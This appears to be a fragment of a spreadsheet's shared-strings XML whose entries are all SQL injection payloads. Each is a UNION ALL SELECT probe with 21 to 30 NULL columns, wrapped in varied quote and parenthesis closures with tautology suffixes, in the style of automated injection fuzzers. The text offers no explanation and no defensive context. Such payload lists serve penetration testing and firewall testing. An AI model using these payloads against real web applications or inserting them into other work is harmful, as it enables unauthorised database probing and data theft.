    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "aDsH" = "aDsH</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "QJFn" = "QJFn</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "PjWt" = "PjWt</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "qsVM" = "qsVM</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "jBEE" = "jBEE</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "qJuU" LIKE "qJuU</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "rghb" LIKE "rghb</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "nbOx" LIKE "nbOx</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "RRgo" LIKE "RRgo</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "EnWv" LIKE "EnWv</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "GlDC" LIKE "GlDC</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "whAo" LIKE "whAo</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "iQVP" LIKE "iQVP</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "YsSD" LIKE "YsSD</t>
  </si>
  <si>
    <t>" )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( "MeRq" LIKE "MeRq</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "jMsC" LIKE "jMsC</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "gwPV" LIKE "gwPV</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "zZtR" LIKE "zZtR</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "UyzQ" LIKE "UyzQ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "QgsK" LIKE "QgsK</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "jqtf" LIKE "jqtf</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "dfyJ" LIKE "dfyJ</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "gkMH" LIKE "gkMH</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "MhRb" LIKE "MhRb</t>
  </si>
  <si>
    <t>"  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  "taXx" LIKE "taXx</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "Ktzp" LIKE "Ktzp</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "gvdo" LIKE "gvdo</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "qiiP" LIKE "qiiP</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "auyA" LIKE "auyA</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "rrXg" LIKE "rrXg</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "Myhz" LIKE "Myhz</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "FVXR" LIKE "FVXR</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "kvcC" LIKE "kvcC</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "bfRY" LIKE "bfRY</t>
  </si>
  <si>
    <t>"  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( "bERk" LIKE "bERk</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "kVyl" LIKE "kVyl</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "mtJT" LIKE "mtJT</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "IWDt" LIKE "IWDt</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "Sirq" LIKE "Sirq</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "paTK" LIKE "paTK</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "ZAjl" LIKE "ZAjl</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "Jqwb" LIKE "Jqwb</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "uwok" LIKE "uwok</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "Yhhw" LIKE "Yhhw</t>
  </si>
  <si>
    <t>" UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND "kAnF" LIKE "kAnF</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 3423 = 3423</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 5178 = 5178</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 3654 = 3654</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 94 = 94</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 7370 = 7370</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 3491 = 3491</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 2851 = 2851</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 2007 = 2007</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 9839 = 9839</t>
  </si>
  <si>
    <t xml:space="preserve"> )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 7709 = 7709</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  5890 = 5890</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  8485 = 8485</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  6652 = 6652</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  484 = 484</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  1255 = 1255</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  3757 = 3757</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  1412 = 1412</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  6568 = 6568</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  8606 = 8606</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  8301 = 8301</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 8959 = 8959</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 3935 = 3935</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 9286 = 9286</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 1418 = 1418</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 8574 = 8574</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 9690 = 9690</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 4881 = 4881</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 9707 = 9707</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 8197 = 8197</t>
  </si>
  <si>
    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 472 = 472</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'sYzQ' = 'sYzQ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'poUf' = 'poUf</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'tsbN' = 'tsbN</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'tmWG' = 'tmWG</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'ECeA' = 'ECeA</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'MIcA' = 'MIcA</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'QILk' = 'QILk</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'mbHr' = 'mbHr</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'fBPn' = 'fBPn</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND  ( 'krtQ' = 'krtQ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'batn' = 'batn</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'pXmS' = 'pXmS</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'HLei' = 'HLei</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'uZpy' = 'uZpy</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'HEhp' = 'HEhp</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'HFlM' = 'HFlM</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'kJXd' = 'kJXd</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'QhZg' = 'QhZg</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (  'qlCQ' = 'qlCQ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'oAun' = 'oAun</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL-- AND   (  (   ( 'Fqnf' = 'Fqnf</t>
